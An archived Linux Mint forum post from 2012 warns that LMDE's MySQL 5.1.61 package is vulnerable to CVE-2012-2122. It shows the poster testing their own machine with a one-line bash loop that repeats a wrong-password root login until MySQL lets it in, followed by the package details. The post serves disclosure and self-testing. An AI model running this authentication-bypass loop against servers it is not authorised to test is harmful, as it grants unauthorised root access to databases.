LMDE and mysql CVE-2012-2122

Archived topics about LMDE 1
Forum rules
Level 1
Level 1
Posts: 27
Joined: Sun May 15, 2011 12:00 am

LMDE and mysql CVE-2012-2122

Postby scottlinux » Mon Jun 11, 2012 7:03 pm

Heads up on a big mysql vuln going around,

https://community.rapid7.com/community/ ... w-in-mysql

http://security-tracker.debian.org/trac ... -2012-2122

LMDE update pack 4 - 64bit appears to be vulnerable

Code: Select all

stmiller@brahms:~$ sudo /etc/init.d/mysql start
[sudo] password for stmiller:
Starting MySQL database server: mysqld.
Checking for tables which need an upgrade, are corrupt or were
not closed cleanly..
stmiller@brahms:~$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 2>/dev/null; done
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 161
Server version: 5.1.61-2 (Debian)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.


Code: Select all

stmiller@brahms:~$ dpkg -s mysql-server
Package: mysql-server
Status: install ok installed
Priority: optional
Section: database
Installed-Size: 65
Maintainer: Debian MySQL Maintainers <pkg-mysql-maint@lists.alioth.debian.org>
Architecture: all
Source: mysql-5.1
Version: 5.1.61-2
Depends: mysql-server-5.1
Description: MySQL database server (metapackage depending on the latest version)
 This is an empty package that depends on the current "best" version of
 mysql-server (currently mysql-server-5.1), as determined by the MySQL
 maintainers. Install this package if in doubt about which MySQL
 version you need. That will install the version recommended by the
 package maintainers.
 MySQL is a fast, stable and true multi-user, multi-threaded SQL database
 server. SQL (Structured Query Language) is the most popular database query
 language in the world. The main goals of MySQL are speed, robustness and
 ease of use.
Homepage: http://dev.mysql.com/

Return to “Archive”